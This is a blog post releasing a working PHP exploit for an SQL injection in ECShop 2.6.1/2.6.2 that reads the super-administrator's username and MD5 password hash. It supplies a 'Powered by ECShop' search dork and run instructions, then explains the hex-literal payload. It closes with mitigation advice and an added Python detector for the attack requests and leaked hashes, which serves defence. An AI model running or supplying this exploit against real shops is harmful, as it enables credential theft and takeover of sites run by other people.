New ECShop 0day: affects ECShop 2.6.1/2.6.2

Qglfnts Blog

EXP affecting ECShop 2.6.1/2.6.2:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.esunk.cn
dork: "Powered by ECShop"
+---------------------------------------------------------------+
');

/**
 * works with register_globals = On
 */

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:  target server (ip/hostname)
path:  path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();

// The injected row comes back inside an href as <user_name>:<32-char md5>
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);

if ($hash)
    exit("Exploit Success!\nadmin:\t\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");

function send()
{
    global $host, $path;

    // 0x3a is ':' and bin2hex('all') is 0x616c6c, so no quote character is needed
    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';

    $data  = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    if (!$fp)
        exit("Connection to $host:80 failed!\n");

    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}
?>

Save the code above as a .php file, e.g. 1.php. Usage: php.exe 1.php host path, where path is the directory the shop is installed in. Most sites are installed at the web root, so the path is written as /.

What the script does: it sends a single POST to goods_script.php with a throwaway type value (the current timestamp) and a form field named sql that carries the attacker's query. With register_globals = On that request field is registered as the script's $sql variable and runs against the database; the row it returns is rendered into an href in the response, and the preg_match pulls the admin user name and the MD5 password hash out of that link. Two details of the payload are worth noting: 0x3a is the ':' separator for CONCAT, and 0x616c6c is bin2hex('all'), i.e. action_list='all', which selects the super-administrator row without putting a quote character into the request. The trailing # is a MySQL comment marker, so anything the script appends after the injected text is ignored.

The script only works when register_globals is On (Off by default since PHP 4.2 and removed in PHP 5.4), so the first thing to check on an ECShop install is php.ini. A 2.6.1/2.6.2 site that has been running with register_globals On should assume its admin hash has already been read: patch, turn register_globals off, and change the admin password.
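Added example, not part of the original post and not ECShop code: a small Python check for the defender's side of this bug. It scans raw HTTP requests, as a reverse proxy or request-logging hook would see them, for an sql parameter aimed at goods_script.php (both the POST body the exploit uses and the query string, since register_globals registers either), decodes the 0x.. hex literals so the analyst sees the real string values, and applies the exploit's own href regex to a response to show what the leak looks like. The request and response samples are constructed here; the exact page layout that puts the injected goods_id into a link is an assumption taken from the exploit's preg_match.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Keywords that should never show up in a request parameter a PHP script
# might register as a variable and hand to the database.
SQL_KEYWORDS = re.compile(r"\b(select|union|concat|from|where)\b", re.I)
# MySQL hex string literals such as 0x616c6c ('all'), used to avoid quotes.
HEX_LITERAL = re.compile(r"0x([0-9a-f]+)", re.I)
# Response-side indicator, tightened from the exploit's preg_match:
# an href whose tail is <name>:<32 hex chars>, i.e. user_name:md5(password).
LEAK = re.compile(r'href="([^\s"]+):([a-z0-9]{32})"')


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def decode_hex_literals(sql):
    """Render 0x.. literals as quoted strings so the compared values are visible."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:          # odd length is not a valid byte string
            return m.group(0)
        return repr(bytes.fromhex(digits).decode("latin-1"))
    return HEX_LITERAL.sub(repl, sql)


def check_request(raw):
    """Return a finding dict if the request carries an `sql` parameter with SQL in it, else None."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    if not url.path.endswith("goods_script.php"):
        return None
    params = {}
    if method == "POST" and "x-www-form-urlencoded" in headers.get("content-type", ""):
        params = parse_qs(body, keep_blank_values=True)
    # register_globals does not care whether a variable came from GET or POST
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    for value in params.get("sql", []):
        if SQL_KEYWORDS.search(value):
            return {"path": url.path, "sql": decode_hex_literals(value)}
    return None


def extract_leak(html):
    """Return (prefix, md5) if a response exposes a user_name:md5 pair the way the exploit expects."""
    m = LEAK.search(html)
    return (m.group(1), m.group(2)) if m else None


# Constructed samples (not captured traffic). The attack request mirrors the one
# built in send() above; the response layout is an assumption about how the
# injected goods_id ends up inside a link.
SAMPLE_ATTACK = (
    "POST /ecshop/goods_script.php?type=1234567890 HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: Close\r\n"
    "\r\n"
    "sql=SELECT CONCAT(user_name,0x3a,password) as goods_id "
    "FROM ecs_admin_user WHERE action_list=0x616c6c LIMIT 1#"
)
SAMPLE_GET_ATTACK = (
    "GET /ecshop/goods_script.php?type=1&sql=SELECT+1+FROM+ecs_admin_user HTTP/1.1\r\n"
    "Host: shop.example\r\n\r\n"
)
SAMPLE_BENIGN = (
    "GET /ecshop/goods_script.php?type=1 HTTP/1.1\r\n"
    "Host: shop.example\r\n\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    '<a href="/goods.php?id=admin:0123456789abcdef0123456789abcdef">admin</a>'
)

if __name__ == "__main__":
    for label, req in (("POST body", SAMPLE_ATTACK),
                       ("query string", SAMPLE_GET_ATTACK),
                       ("benign", SAMPLE_BENIGN)):
        print(label, "->", check_request(req))
    print("leak ->", extract_leak(SAMPLE_RESPONSE))
```

The decoded finding for the sample attack reads WHERE action_list='all', which is the cue that the query is after the super-administrator row rather than product data; a rule that only looked for a quote character would miss this payload entirely.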


